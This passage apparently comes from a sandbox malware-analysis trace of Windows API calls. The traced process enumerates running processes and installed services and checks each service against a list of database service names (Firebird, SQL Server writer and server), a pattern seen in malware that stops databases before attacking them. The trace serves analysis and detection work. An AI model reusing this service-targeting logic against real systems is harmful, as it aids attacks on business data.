(lpString="svchost.exe") returned 11 [0194.486] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.486] lstrlenW (lpString="svchost.exe") returned 11 [0194.486] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0194.487] lstrlenW (lpString="spoolsv.exe") returned 11 [0194.487] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.487] lstrlenW (lpString="svchost.exe") returned 11 [0194.488] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0194.488] lstrlenW (lpString="audiodg.exe") returned 11 [0194.488] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0194.489] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0194.489] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0194.489] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0194.489] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0194.490] lstrlenW (lpString="Memory Compression") returned 18 [0194.490] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0194.491] lstrlenW (lpString="sihost.exe") returned 10 [0194.491] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.491] lstrlenW (lpString="svchost.exe") returned 11 [0194.492] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0194.492] lstrlenW (lpString="msoia.exe") returned 9 [0194.492] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0194.493] lstrlenW (lpString="taskhostw.exe") returned 13 [0194.493] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.494] lstrlenW (lpString="explorer.exe") returned 12 [0194.494] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0194.495] lstrlenW (lpString="SearchUI.exe") returned 12 [0194.495] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0194.496] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0194.496] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0194.496] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0194.496] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.497] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0194.497] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0194.498] lstrlenW (lpString="hgaibc.exe") returned 10 [0194.498] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0194.499] CloseHandle (hObject=0x358) returned 1 [0194.499] Sleep (dwMilliseconds=0x1f4) [0195.006] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bef20 [0195.007] EnumServicesStatusExW (in: hSCManager=0x6bef20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0195.008] GetLastError () returned 0xea [0195.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d97a8 [0195.008] EnumServicesStatusExW (in: hSCManager=0x6bef20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d97a8, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d97a8, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0195.009] CloseServiceHandle (hSCObject=0x6bef20) returned 1 [0195.009] lstrlenW (lpString="Appinfo") returned 7 [0195.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0195.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0195.009] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0195.009] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0195.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0195.009] lstrlenW (lpString="AppXSvc") returned 7 [0195.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0195.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0195.010] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0195.010] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0195.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0195.010] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0195.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0195.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0195.010] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0195.010] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0195.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0195.010] lstrlenW (lpString="Audiosrv") returned 8 [0195.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0195.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0195.010] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0195.010] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0195.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0195.010] lstrlenW (lpString="BFE") returned 3 [0195.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0195.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0195.010] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0195.010] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0195.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0195.010] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0195.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0195.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0195.010] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0195.010] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0195.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0195.011] lstrlenW (lpString="CDPSvc") returned 6 [0195.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0195.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0195.011] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0195.011] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0195.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0195.011] lstrlenW (lpString="ClickToRunSvc") returned 13 [0195.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0195.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0195.011] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0195.011] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0195.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0195.011] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0195.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0195.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0195.011] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0195.011] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0195.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0195.011] lstrlenW (lpString="CryptSvc") returned 8 [0195.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0195.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0195.011] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0195.011] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0195.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0195.011] lstrlenW (lpString="DcomLaunch") returned 10 [0195.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0195.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0195.011] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0195.012] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0195.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0195.012] lstrlenW (lpString="DeviceAssociationService") returned 24 [0195.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0195.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0195.012] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0195.012] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0195.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0195.012] lstrlenW (lpString="Dhcp") returned 4 [0195.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0195.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0195.012] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0195.012] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0195.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0195.012] lstrlenW (lpString="Dnscache") returned 8 [0195.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0195.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0195.012] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0195.012] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0195.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0195.012] lstrlenW (lpString="DPS") returned 3 [0195.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0195.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0195.012] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0195.012] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0195.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0195.012] lstrlenW (lpString="DusmSvc") returned 7 [0195.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0195.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0195.013] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0195.013] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0195.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0195.013] lstrlenW (lpString="EventLog") returned 8 [0195.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0195.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0195.013] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0195.013] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0195.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0195.013] lstrlenW (lpString="EventSystem") returned 11 [0195.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0195.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0195.013] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0195.013] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0195.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0195.013] lstrlenW (lpString="FontCache") returned 9 [0195.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0195.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0195.013] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0195.013] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0195.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0195.013] lstrlenW (lpString="gpsvc") returned 5 [0195.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0195.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0195.013] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0195.013] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0195.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0195.013] lstrlenW (lpString="iphlpsvc") returned 8 [0195.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0195.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0195.014] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0195.014] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0195.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0195.014] lstrlenW (lpString="KeyIso") returned 6 [0195.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0195.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0195.014] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0195.014] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0195.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0195.014] lstrlenW (lpString="LanmanServer") returned 12 [0195.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0195.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0195.014] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0195.014] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0195.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0195.014] lstrlenW (lpString="LanmanWorkstation") returned 17 [0195.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0195.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0195.014] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0195.014] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0195.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0195.014] lstrlenW (lpString="lfsvc") returned 5 [0195.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0195.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0195.014] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0195.014] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0195.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0195.015] lstrlenW (lpString="lmhosts") returned 7 [0195.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0195.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0195.015] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0195.015] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0195.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0195.015] lstrlenW (lpString="LSM") returned 3 [0195.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0195.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0195.015] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0195.015] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0195.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0195.015] lstrlenW (lpString="MpsSvc") returned 6 [0195.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0195.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0195.015] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0195.015] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0195.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0195.015] lstrlenW (lpString="NcbService") returned 10 [0195.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0195.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0195.015] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0195.015] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0195.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0195.015] lstrlenW (lpString="netprofm") returned 8 [0195.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0195.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0195.015] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0195.016] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0195.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0195.016] lstrlenW (lpString="NgcSvc") returned 6 [0195.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0195.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0195.016] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0195.016] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0195.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0195.016] lstrlenW (lpString="NlaSvc") returned 6 [0195.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0195.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0195.016] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0195.016] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0195.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0195.016] lstrlenW (lpString="nsi") returned 3 [0195.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0195.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0195.016] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0195.016] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0195.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0195.016] lstrlenW (lpString="PcaSvc") returned 6 [0195.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0195.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0195.016] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0195.016] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0195.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0195.016] lstrlenW (lpString="PlugPlay") returned 8 [0195.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0195.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0195.017] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0195.017] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0195.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0195.017] lstrlenW (lpString="Power") returned 5 [0195.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0195.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0195.017] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0195.017] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0195.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0195.017] lstrlenW (lpString="ProfSvc") returned 7 [0195.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0195.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0195.017] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0195.017] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0195.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0195.017] lstrlenW (lpString="RpcEptMapper") returned 12 [0195.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0195.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0195.017] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0195.017] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0195.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0195.017] lstrlenW (lpString="RpcSs") returned 5 [0195.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0195.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0195.017] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0195.017] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0195.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0195.017] lstrlenW (lpString="SamSs") returned 5 [0195.018] lstrcmpiW 